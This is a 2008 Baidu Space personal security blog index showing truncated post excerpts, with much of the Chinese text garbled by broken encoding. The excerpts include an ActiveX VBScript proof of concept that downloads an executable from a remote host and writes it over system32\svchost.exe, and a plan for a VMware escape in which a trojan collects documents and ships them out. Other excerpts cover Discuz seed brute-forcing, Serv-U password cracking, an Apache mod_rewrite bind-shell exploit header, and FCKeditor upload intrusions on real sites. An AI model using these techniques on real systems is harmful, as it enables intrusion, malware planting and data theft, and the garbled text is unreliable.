Tlwbw's Blog
°Ù¶È¿Õ¼ä | °Ù¶ÈÊ×Ò³ 
 
ÎÄÕÂÁбí
 
2008-11-21 17:20

û×Ðϸ¿´ ´óÖÂÊÇÕâÑù
©¶´Ó¦¸ÃÊdzöÔÚ discuzcode.func.phpÖÐµÄ mt_srand((double)microtime() * 1000000);
ÓÉÕâ¸öµÃµ½µÄ²¥ÖÖÓ¦¸ÃÊÇ1000000ÒÔÄÚµÄÊý×Ö

ËùÒÔ¿ÉÒÔ¸ù¾Ý$sid[1]·´²é³öÖÖ×Ó
for ($seed = 0; $seed <= 1000000; $seed ++) {
mt_srand($seed);
$id = random(6);
if ($id == $sid[1])
return $seed;
}
return false;
}


discuzÖеÄrandom
function random($length, $numeric = 0) {
    PHP_VERSION < '4.2.0' &&
 
2008-09-10 10:16
<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://victim.com/svchost.exe"
test.Open remURL, True
test.Save "C:\WINDOWS\system32\svchost.exe", True
End Sub
</script>
 
2008-05-15 18:08

¼Ç¼ÏÂ

ÍøÉÏ¿´ÁËºÜ¶à ¶¼Ã»¸ã¶¨ ×îºó·¢ÏÖÊÇÁ½¸öÕ¾ÓÃÒ»¸öÓ¦ÓóصÄÎÊÌâ н¨ÁËÒ»¸ö¸ã¶¨ ºÙºÙ £º£©

ÏÂÃæÊÇÍøÉϵÄһЩ½â¾ö·½·¨£º

PHP has encountered an Access Violation at 7C94BD02 ½â¾ö·½·¨

ÏÈÖØÆôÒ»ÏÂIIS¾ÍÄܵ±Ê±½â¾öÕâ¸öÎÊÌâ!

½â¾ö·½·¨ÈçÏÂ:


µÚÒ»ÖÖ¿ÉÄÜ£º

È¥µô phpÖÐ eaccelerator µÄÀ©Õ¹
ÕâÑù×öÄܹ»½â¾öÄúµÄÎÊÌ⣬²»¹ý¿ÉÄÜ»á¼ÓÖØÏµÍ³¸ºµ£
ÒòΪeacceleratorÖ÷ÒªÊÇΪÁ˽ÚÊ¡
 
2008-04-21 22:53
Exploitable issue in various Adobe products
c0ntex (c0ntexb@gmail.com) Scott Laurie
February 2008

Vulnerable applications, tested:
Adobe Photoshop Album Starter
Adobe After Effects CS3
Adobe Photoshop CS3

Not Vulnerable applications, tested:
Adobe Reader
Adobe Flash Player

This bug is related to the parsing of header images, in that the applications
do not verify that the image header is valid before trying to render it. This
leaves an
 
2008-04-14 10:06

Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-04-10

¾­ÄÚ²¿ÌÖÂÛºó¾ö¶¨¹«²¼·ÖÎö³É¹û¡£

4ÔÂ8ºÅmicrosoftÔٴη¢²¼ÁËÒ»¸öϵͳÄں˵IJ¹¶¡(KB941693),΢Èí¶Ô¸Ã©¶´µÄÃèÊöΪ: ´Ë°²È«¸üнâ¾ö Windows ÄÚºËÖÐÒ»¸öÃØÃܱ¨¸æµÄ©¶´¡£ ³É¹¦ÀûÓôË©¶´µÄ±¾µØ¹¥»÷Õß¿ÉÒÔÍêÈ«¿ØÖÆÊÜÓ°ÏìµÄϵͳ¡£ ¹¥»÷Õß¿ÉËæºó°²×°³ÌÐò£»²é¿´¡¢¸ü¸Ä»òɾ³ýÊý¾Ý£»»òÕß´´½¨ÐÂÕÊ»§¡£ÕâÊÇÓÃÓÚ Windows 2000¡¢Windows XP¡¢Windows Server 2003¡¢Windows Vista ºÍ Window
 
2008-03-17 22:35
http://secunia.com/advisories/29413/

1¡¢Ê×ÏÈÔÚÄǸöVmware¹²ÏíĿ¼ÏÂдһ¸öÎļþ£¬ÎļþÃûҪΨһ£»
2¡¢ÔÙÀûÓé¶´ÏÈдÁ½¸öÎļþµ½ÕæÊµ»ú£¬Ò»¸öÊÇAutorun.inf£¬Ò»¸öľÂí£¬ÀûÓÃAutorunÖ´ÐÐľÂí¡£
3¡¢Ä¾ÂíÔËÐкóÊ×ÏÈÒþ²Ø×ÔÉí£¬ÔÚµ±Ç°ÔËÐеÄÅÌ·ûÏÂËÑË÷¸Õ¸ÕÔÚVmware¹²ÏíĿ¼Ï½¨Á¢µÄΨһÎļþÃû£¬ÕÒµ½Õâ¸öÎļþ£¬¾ÍÕÒµ½ÁËÕæÊµ»úÓëÐéÄâ»úÖ®¼äΨһµÄïÆºÏµãĿ¼£¬Ò²¾Í³É¹¦ÁËÒ»°ë¡£
4¡¢È«Ó²ÅÌËÑË÷Ãô¸ÐÎļþ£¬ÀýÈ磺*.doc£¬*.txt£¬*.cppµÈ£¬´ò°üѹËõ¸´ÖƵ½ÓиղÅÕÒµ½µÄïÆºÏµãĿ¼£»
5¡¢×îºóVmwareÄڵľÂí½«Îļþ¶ÁÈ¡·¢×ß¡£
 
2007-06-04 17:32
By superhei

ÉîÍÚSERV-UÃÜÂë
·½·¨Ò»£º±¬ÆÆ·¨£®×îÏÔÑÛµÄÒªÊôÓà »§ÃûºÍÃÜÂëÁË£¬¹Ø¼üÊÇÈçºÎÆÆÃÜÂëÄØ£¿µ½ÍøÉÏËÑÁËÒ»¸öרÃÅÆÆSERV-UÃÜÂëµÄ¹¤¾ß£¨Serv-UPassCrack1.0a.rar£©£¬Ì«ÂýÁË£¬ÕâÒªµÈµ½ ºÎÄêºÎÔ°¡£¡¸É´àÓüÇʱ¾´ò¿ªËüµÄ½Å±¾crack.vbs£®¿´¿´½âÃÜÔ­Àí£º¼ÙÉèÔ­À´Ã÷ÎÄÃÜÂëÓÃ"password_mingwen"±íʾ£¬ÃÜÎÄÃÜÂëÒ²¾ÍÊÇ ÎÒÃÇÔÚServUDaemon.iniÖп´µ½µÄÃÜÂ루34룩£¬ÓÃ"password_miwen"±íʾ,ÃÜÎĵÄǰÁ½Î»ºÏ²¢ÉÏÃ÷ÎÄ£¬È»ºó

 
2007-05-28 11:26
/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/

Usage: ./apach
 
2007-05-22 14:41
ת£ºDany's blog


ǰ²»¾ÃÄõ½Ò»¸öÕ¾webshell

·¢ÏÖÀïÃæÓиöÕ¾³ÌÐò»¹²»´í..¿ÉÃÜÂëÒ»Ö±ÕÒ²»µ½..
¿´µÇ½ÑéÖ¤´úÂëµÄʱºò¾ÍÏëÊÇ·ñ¿ÉÒÔÐ޸ĴúÂë..ÈÆ¹ýÑéÖ¤·ÃÎʺóÌ¨ÄØ..¼ÇµÄÒÔǰnowthk½Ì¹ýÎÒ..¿ÉÁ¯ÎÒÕâ¸ö¼ÇÐÔ°¡..¸øÍüÁË..ÓÖÇë½ÌÁËÏÂnowthk...

login.aspµÄÑéÖ¤´úÂë
<% dim user_name,user_password,upwr,uID,ukey,cmd,rs
user_name=trim(request.form("uid"))
user_password=trim(request.form("pwd"))
user_password=jk_md5(user_password,"long")
if
 
2007-05-21 13:49
ת:S e c u r i t y. F a n s. S e c F a n s 's blog

ÔÚCNµÄblogÉÏ¿´µ½µÄ£¬¸Ð¾õÕâ¸ö·½·¨ºÜ²»´í¡£
ÍíÉϺͱ¦¿´¸ǫ̈ÍåµÄÕ¾,ºǫ́Ì×ÓõÄÊÇFCKeditorµÄϵͳ.
ÕâÃ²ËÆÊǸöÈ«ÊÀ½ç¶¼ÔÚÓõı༭ϵͳ,ʲôº«¹úÈÕ±¾Ì¨ÍåÃÀ¹úµÄÕ¾¶¼ÔÚÓÃ

ÔÙÈëÇÖµÄʱºò,±¦·¢ÏÖµÄÐĵÃÎҼǼÏÂ:

http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

´ò¿ªÕâ¸öµØÖ·¾Í¿ÉÒÔÉÏ´«ÈκÎÀàÐ͵ÄÎļþÁË,ÎҺͱ¦ÉÏ´«µÄÊÇ.asaµÄ,Ôڱ༭Æ÷µÄĿ¼ÏÂ

 
     
 
 
¸öÈ˵µ°¸
 
tlwbw
ÄÐ, 25Ëê
±±¾© º£µíÇø 
ÉϴεǼ£º
6Ììǰ
¼ÓΪºÃÓÑ
 
   
 
ÎÄÕ·ÖÀà
 
 
 
 
 
 
 
 
 
     
 
ÁôÑÔ°å
 

ͼƬ
 

̫ǿÁË
 

ºÇºÇ ÊǵÄ
 

¸üÏñ×Ô¼ºµÄ±¸Íü¼
 

ÎÒ²»ÊǸßÊÖ Ï£ÍûºÍ´ó¼Ò¹²Í¬½»Á÷½ø²½ ºÇºÇ:-)
 
     
 
×îÐÂÆÀÂÛ
 
     
 
¶©ÔÄÎҵĿռä
 
ÒÑÓÐÈ˴ηÃÎʱ¾¿Õ¼ä
 
¶©ÔÄRSS  Ê²Ã´ÊÇRSS£¿

ÄúÒ²ÏëÓµÓÐÕâÑùµÄ¿Õ¼ä£¿Çëµã´ËÉêÇë¡£
     


©2009 Baidu